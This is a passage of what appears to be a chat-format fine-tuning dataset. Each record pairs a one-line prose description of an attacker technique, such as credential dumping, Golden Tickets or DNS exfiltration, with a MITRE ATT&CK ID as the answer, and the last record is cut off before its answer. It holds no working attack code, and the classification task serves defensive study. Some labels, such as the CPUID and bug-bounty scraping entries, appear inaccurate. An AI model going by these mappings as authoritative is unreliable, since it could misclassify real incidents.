- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker performed a domain hijacking attack by stealing the DNS credentials from the registrar and pointed the domain to malicious servers."
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Compromise Infrastructure: Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary performs a search on DuckDuckGo for the company's domain name to locate open webpages and subdomains."
- },
- {
- "role": "assistant",
- "content": "T1593.002 - Search Open Websites/Domains: Search Engines"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Encrypted malicious traffic is forged to look like legitimate VPN traffic, evading network monitoring."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Data Obfuscation: Protocol Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary extracts stored passwords from the victim's Chrome password manager using a malicious browser extension."
- },
- {
- "role": "assistant",
- "content": "T1555.005 - Credentials from Password Stores: Password Managers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fileless code streams stolen data directly to a remote FTP server without writing to disk."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After gaining user access, the malware parses the bash history to extract API keys typed in previous sessions."
- },
- {
- "role": "assistant",
- "content": "T1552.003 - Unsecured Credentials: Bash History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor runs the 'driverquery /v /fo csv' command to gather detailed driver information for later exploitation."
- },
- {
- "role": "assistant",
- "content": "T1652 - Device Driver Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker enumerates local Windows groups using the \"net localgroup\" command to identify privileged accounts."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A rootkit uses direct kernel object manipulation (DKOM) to hide its processes from the task manager."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary gains access to private keys that are saved in clear text within application directories."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor leverages PowerShell to extract credentials stored in the Registry under HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\DefaultUserName."
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious actor modifies the 'unsigned code execution' policy in macOS Gatekeeper to allow execution of unsigned apps."
- },
- {
- "role": "assistant",
- "content": "T1553.006 - Subvert Trust Controls: Code Signing Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious executable calls the EnumSoftwareProducts API to retrieve software details from the target's operating system."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A post-exploitation script calls NetLocalGroupEnum to retrieve a list of local groups for further privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An adversary accesses DNS replication logs on public servers to retrieve past domain-to-IP mappings, facilitating reconnaissance of the victim’s network."
- },
- {
- "role": "assistant",
- "content": "T1596.001 - Search Open Technical Databases: DNS/Passive DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor used a signed firmware package to replace the BIOS image on target machines, modifying the system image to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1601.001 - Modify System Image: Patch System Image"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A post‑exploitation script scans /proc for processes owned by root and reads their memory via /proc/[pid]/mem to retrieve cached credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.007 - OS Credential Dumping: Proc Filesystem"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary uses a compromised FTP account to replace the website's CSS and JavaScript files, causing the site to render a defaced layout for all users."
- },
- {
- "role": "assistant",
- "content": "T1491.002 - Defacement: External Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware directly calls Windows kernel32.dll functions to load and execute a payload without using higher‑level scripting languages."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A script disables the macOS Unified Logging for command line tools, ensuring that command history is not captured."
- },
- {
- "role": "assistant",
- "content": "T1562.003 - Impair Defenses: Impair Command History Logging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware calls the GetSystemTime API to retrieve the host's time settings."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A post‑exploitation tool replaces the default callback functions in the KernelCallbackTable to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1574.013 - Hijack Execution Flow: KernelCallbackTable"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Compromised firmware updates are used to embed malicious modules that execute in the pre-OS environment."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Pre-OS Boot: Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Red team activity includes editing policy files to bypass code signing checks for executables and libraries."
- },
- {
- "role": "assistant",
- "content": "T1553.006 - Subvert Trust Controls: Code Signing Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors create a rule in the compromised user's Outlook to automatically forward all incoming emails to an external address they control."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware creates a hidden archive and pushes it to a remote Dropbox folder, awaiting later collection."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Data Staged: Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker leverages a legitimate remote desktop protocol session to tunnel stolen files out of the network."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware encrypts exfiltrated data and sends it in several DNS queries, each limited to 512 bytes."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An insider threat forwards a phishing email, originally received from an external source, to colleagues, adding a malicious payload to increase infection rates."
- },
- {
- "role": "assistant",
- "content": "T1534 - Internal Spearphishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion leverages a custom script to query the Windows Management Instrumentation (WMI) for software details."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malware drops a shortcut in the Start Menu’s Programs folder that references a hidden script, achieving persistence via shortcut modification."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Red team simulates exfiltration by packaging data in an encrypted payload and sending it over a VPN‑like protocol that is not designated for C2."
- },
- {
- "role": "assistant",
- "content": "T1048.001 - Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor periodically runs a cryptographic hash function on the current date to produce domain strings, contacting each until one resolves to the malicious server."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Dynamic Resolution: Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker scans the target's public IP range using Nmap to discover open ports and services."
- },
- {
- "role": "assistant",
- "content": "T1595.001 - Active Scanning: Scanning IP Blocks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor used a custom binary that sends random data streams to the block device, wiping its contents."
- },
- {
- "role": "assistant",
- "content": "T1561.001 - Disk Wipe: Disk Content Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary manipulates the Netlogon service to execute a custom script that establishes a reverse shell on the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1037.003 - Boot or Logon Initialization Scripts: Network Logon Script"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary contacts a foreign vendor to buy proprietary schematics of a target's proprietary hardware for a fee."
- },
- {
- "role": "assistant",
- "content": "T1597.002 - Search Closed Sources: Purchase Technical Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion set employs the 'logadm' tool to purge old logs and hide tracks on a Solaris system."
- },
- {
- "role": "assistant",
- "content": "T1070.002 - Indicator Removal: Clear Linux or Mac System Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor configures its malware to encrypt all communications with a static symmetric key, establishing a covert encrypted channel for data transfer."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Encrypted Channel: Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A backdoor encodes its traffic to look like standard DNS over HTTPS (DoH) requests, blending with legitimate DNS traffic."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Data Obfuscation: Protocol Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious actors deploy a containerized malicious service via Kubernetes on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1610 - Deploy Container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware drops a copy of rundll32.exe and uses it to execute a malicious function exported by a DLL named payload.dll."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - System Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware changes the system's power configuration to set the \"High performance\" plan and disables sleep timers, ensuring the compromised host remains active for continuous command‑and‑control activity."
- },
- {
- "role": "assistant",
- "content": "T1653 - Power Settings"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An intruder exploits a vulnerability in a network appliance to overwrite the TACACS+ server settings, redirecting authentication requests to a rogue server."
- },
- {
- "role": "assistant",
- "content": "T1556.004 - Modify Authentication Process: Network Device Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary used a valid user credential to access Confluence and copy all attachments from the finance space."
- },
- {
- "role": "assistant",
- "content": "T1213.001 - Data from Information Repositories: Confluence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The infection registers a service with the name \"svchost\" to blend in with legitimate processes."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attacker uses the net user command to generate a hidden local account."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AAPT modifies the JSON configuration files of a web service to disable security checks."
- },
- {
- "role": "assistant",
- "content": "T1565.001 - Data Manipulation: Stored Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This threat uses a Domain Generation Algorithm to produce new DNS names for each infection."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Dynamic Resolution: Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker uses a privileged script to change the boot configuration data, enabling Safe Mode boot and bypassing AV software."
- },
- {
- "role": "assistant",
- "content": "T1562.009 - Impair Defenses: Safe Mode Boot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ransomware enumerates running processes for known sandbox analysis tools like 'procmon.exe' and aborts if any are found."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors probe the service registry keys to enumerate services and their configurations."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious actors abuse the Windows Service Control Manager to start a new service that runs their ransomware."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious script repeatedly opens TCP connections to a target's port 80, never completing the handshake, to deplete network resources."
- },
- {
- "role": "assistant",
- "content": "T1498.001 - Network Denial of Service: Direct Network Flood"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor updates the UEFI firmware with a rootkit, enabling persistence across OS reinstalls."
- },
- {
- "role": "assistant",
- "content": "T1542.001 - Pre-OS Boot: System Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker uses the regsvcs command to execute a payload embedded in a .NET DLL, exploiting the System Binary Proxy Execution vector."
- },
- {
- "role": "assistant",
- "content": "T1218.009 - System Binary Proxy Execution: Regsvcs/Regasm"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker calls employees pretending to be IT support, asking them to disclose their credentials over the phone."
- },
- {
- "role": "assistant",
- "content": "T1566.004 - Phishing: Spearphishing Voice"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By abusing the SystemParametersInfo API, the malware programmatically sets a rogue screensaver that loads a DLL executing ransomware code upon activation."
- },
- {
- "role": "assistant",
- "content": "T1546.002 - Event Triggered Execution: Screensaver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious actor uses a stolen user hash to forge a Kerberos ticket for the SMB service, achieving covert access to internal shares."
- },
- {
- "role": "assistant",
- "content": "T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors execute `dsquery group` to gather information about domain groups in an on‑premises Active Directory environment."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The exploit uses NTFS reparse points to redirect file system calls to a hidden directory containing the payload, making it invisible to casual inspection."
- },
- {
- "role": "assistant",
- "content": "T1564.005 - Hide Artifacts: Hidden File System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker creates a Golden Ticket by abusing the KRBTGT hash, enabling them to authenticate as any user and maintain long-term control over the Active Directory environment."
- },
- {
- "role": "assistant",
- "content": "T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malware sample reads the Chrome passwords database to harvest saved web login credentials."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries query the Confluence REST API to enumerate pages and download attachments containing sensitive documents."
- },
- {
- "role": "assistant",
- "content": "T1213.001 - Data from Information Repositories: Confluence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During a post‑exploitation phase, the intruder drops a backdoor into termsrv.dll, which is loaded by the Terminal Services service on boot."
- },
- {
- "role": "assistant",
- "content": "T1505.005 - Server Software Component: Terminal Services DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary updates the OS installer image to embed a trojan before deployment."
- },
- {
- "role": "assistant",
- "content": "T1601 - Modify System Image"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious script scrapes public bug bounty platforms for disclosed exploitation techniques and then applies them to similar services identified via internet scans."
- },
- {
- "role": "assistant",
- "content": "T1596.005 - Search Open Technical Databases: Scan Databases"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An advanced persistent threat modifies the browser's certificate store to include a counterfeit root certificate, facilitating seamless traffic decryption for web browsers."
- },
- {
- "role": "assistant",
- "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remote code execution is achieved by creating a WMI event subscription that triggers a payload when a new user logs on."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker uses a custom C++ binary to invoke the CPUID instruction and obtain processor features."
- },
- {
- "role": "assistant",
- "content": "T1592.001 - Gather Victim Host Information: Hardware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware periodically polls a public web service to retrieve encrypted commands, acting as a dead‑drop resolver for C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Web Service: Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries scrape internal company wikis and password-protected document shares for credential information."
- },
- {
- "role": "assistant",
- "content": "T1597 - Search Closed Sources"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries set up a VNC tunnel to bypass firewall restrictions and remotely manage the infected endpoint."
- },
- {
- "role": "assistant",
- "content": "T1021.005 - Remote Services: VNC"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A phishing payload runs a PowerShell script that calls Get-WmiObject Win32_BIOS to harvest BIOS version and firmware details."
- },
- {
- "role": "assistant",
- "content": "T1592.001 - Gather Victim Host Information: Hardware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By editing the UNC path of the network logon script, the adversary causes each client to fetch and execute a malicious payload from an external server."
- },
- {
- "role": "assistant",
- "content": "T1037.003 - Boot or Logon Initialization Scripts: Network Logon Script"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker uses a tool to overwrite the disk's master boot record and partition table, making the system unbootable."
- },
- {
- "role": "assistant",
